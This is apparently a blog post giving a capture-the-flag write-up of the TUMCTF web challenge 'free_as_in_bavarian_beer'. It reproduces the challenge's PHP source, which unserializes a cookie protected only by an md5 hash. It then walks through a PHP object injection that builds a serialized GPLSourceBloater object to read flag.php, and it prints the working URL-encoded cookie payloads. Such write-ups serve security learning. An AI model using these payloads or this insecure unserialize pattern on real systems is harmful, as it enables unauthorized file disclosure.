web / free_as_in_bavarian_beer ( TUMCTF )

The 2-day pentest #dientaphcm.vn finished with no highlight. I feel very tired with my brain, so in this TUMCTF, I only try with one challenge in Web Category.

Main: http://104.154.70.126:10888/index.php

The basic post and basic XSS.

writeup1

but sense imposible to exploit from this bug ^.^ because “hint: flag is in flag.php” and certainly we need to read source code from flag.php.

Something available in this web

http://104.154.70.126:10888/?source

<? // something spam in license.txt ?>

<?php

Class GPLSourceBloater{
public function __toString()
{
return highlight_file(‘license.txt’, true).highlight_file($this->source, true);
}
}

if(isset($_GET[‘source’])){
$s = new GPLSourceBloater();
$s->source = __FILE__;

echo $s;
exit;
}

$todos = [];

if(isset($_COOKIE[‘todos’])){
$c = $_COOKIE[‘todos’];
$h = substr($c, 0, 32);
$m = substr($c, 32);

if(md5($m) === $h){
$todos = unserialize($m);
}
}

if(isset($_POST[‘text’])){
$todo = $_POST[‘text’];

$todos[] = $todo;
$m = serialize($todos);
$h = md5($m);

setcookie(‘todos’, $h.$m);

header(‘Location: ‘.$_SERVER[‘REQUEST_URI’]);
exit;
}

?>
<html>
<head>
<style>
* {font-family: “Comic Sans MS”, cursive, sans-serif}
</style>
</head>

<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href=”?source”><h2>It’s super secure, see for yourself</h2></a>
<ul>
<?php foreach($todos as $todo):?>
<li><?=$todo?></li>
<?php endforeach;?>
</ul>

<form method=”post” href=”.”>
<textarea name=”text”></textarea>
<input type=”submit” value=”store”>
</form>

I try to read source in spite of tired

Something happen in my brain:

what  does  “<? //something spam in license.txt ?>” use to ? Do this help us read source 😀

so “class GPLSourceBloater ” does !!!

I try with google and found http://php.net/manual/en/language.oop5.magic.php

Magic Methods will auto call if object exist.

The Idea in this case is construct a GPLSourceBloater object.

And Object injection help we do this

after a post I get cookie like setcookie(‘todos’, $md5($m).$m); #m is serialize category.

To understand below payload you must check your mind in serialize function

http://php.net/manual/en/function.serialize.php

To construct a GPLSourceBloater Object, I design cookie like serialize an object

and must have ‘this->source=”flag.php”‘ element.

“todos=dc3d729712b1c4f52083accc39148791O%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D”

but it’s print

writeup3

yup, it must be an array of object to print this source.

“todos=dd0216616f68a33acd7e3817e02fd4d5a%3A1%3A%7Bi%3A1%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D”

And I get flag

writeup2

Done!! Good night reader!!

Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Đăng xuất / Thay đổi )

Connecting to %s